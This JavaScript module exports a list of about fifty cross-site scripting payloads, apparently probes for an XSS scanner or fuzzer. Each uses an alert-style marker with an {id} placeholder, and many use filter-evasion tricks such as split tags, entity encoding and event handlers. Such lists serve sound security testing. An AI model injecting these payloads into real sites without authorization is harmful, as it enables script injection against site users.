const payload = [
    '<script>alert({id})</script>',
    "</script><svg/onload=alert({id})>",
    "--><script>alert({id})</script>",
    "&lt;script&gt;alert(&#39;{id}&#39;);&lt;/script&gt;",
    "< / script >< script >alert({id})< / script >",
    "<sc<script>ript>alert({id})</sc</script>ript>",
    "<script\\x20type=\"text/javascript\">javascript:alert({id});</script>",
    "'`\"><\\x3Cscript>javascript:alert({id})</script>",
    "<<SCRIPT>alert(\"{id}\");//<</SCRIPT>",
    "<script>alert(/{id}/);</script>",
    "<script language=javascript>alert({id});</script>",
    '<script\x20type="text / javascript ">javascript:alert({id});</script>',
    '<script src="data:text/plain\x2Cjavascript:alert({id})"></script>',
    '<script>+-+-1-+-+alert({id})</script>',
    '<script\x20type="text/javascript">javascript:alert({id});</script>',
    '<script>%(payload)s</script>',
    '<ScrIpT>alert(String.fromCharCode({id}}))</ScRipT>',
    '<img src=x onerror=alert({id})>',
    '"><img src=x onerror=alert({id})>',
    "\"><img src=x onerror=alert({id})>",
    '<img src="javascript:alert({id})">',
    '<IMG SRC="javascript:javascript:alert({id});">',
    '<IMG SRC=javascript:alert(&quot;XSS&quot;)>',
    '<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">',
    '<img src=`xx:xx`onerror=alert({id})>',
    '<!--<img src="--><img src=x onerror=javascript:alert({id})//">',
    '&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;',
    "<svg onload=alert`{id}`>",
    "<svg onload=alert&lpar;{id}&rpar;>",
    "<svg onload=alert&#x28;{id}&#x29>",
    "<svg onload=alert&#40;{id}&#41>",
    "--!><svg/onload=prompt({id})",
    '<svg><script>//&NewLine;confirm({id});</script </svg>',
    "<svg><style>{font-family&colon;'<iframe/onload=confirm({id})>'",
    'svg / onload = alert({id})',
    '<iframe/src \/\/onload = prompt({id})',
    '<iframe  src="&Tab;javascript:prompt({id})&Tab;">',
    "<BODY ONLOAD=alert({id})>",
    '<BODY ONLOAD=javascript:alert({id})>',
    '<body ONLOAD=document.vulnerable=true;>',
    '" onload=alert({id})',
    '<a href="javas\x04cript:javascript:alert({id})" id="fuzzelement{id}">test</a>',
    '<a href="\x0Bjavascript:javascript:alert({id})">test</a>',
    '<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>',
    '< div style = "x\x3Aexpression(javascript:alert({id})" >',
    '<DIV STYLE="background-image: url(javascript:javascript:alert({id}))">',
    '<div style="x\x3Aexpression(javascript:alert({id})">',
    '<embed code=%(scriptlet)s></embed>',
    '<object onerror=javascript:javascript:alert({id})>',
    '<input onfocus=write({id}) autofocus>',
    '<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>'
];

module.exports = { payload };